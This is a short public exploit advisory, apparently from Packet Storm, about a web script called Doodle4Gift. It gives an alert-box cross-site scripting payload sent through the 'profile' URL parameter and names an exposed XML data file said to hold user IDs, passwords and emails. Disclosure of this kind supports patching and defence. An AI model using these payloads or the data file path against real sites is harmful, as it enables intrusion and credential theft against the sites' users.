Doodgle4Gift suffers from cross site scripting and information disclosure vulnerabilities.
ac6ed020a4de6c84c32ac4a848e07ddc0e3714af223ce17889e8945c33933635# Exploit Title : Doodle4Gift <= Multiple Vulnerabilities
# Author : Dr.NaNo
# Date : H-1435/3/18 - 2014/1/19
# Software Link : http://www.hotscripts.com/listing/doodle4gift/
# Software Link2: https://sites.google.com/site/doodle4gift/
#
#
# (1) Cross Site Scripting (XSS):
#
#
# http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
#
# http://localhost/{path}/index.php?action=showprofile&profile=<script>alert('Dr.nano')</script>
#
#
#
# (2) information disclosure:
#
#
# http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
#
#
#
# A special gift for: (P0c Team),(V4-Team):
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed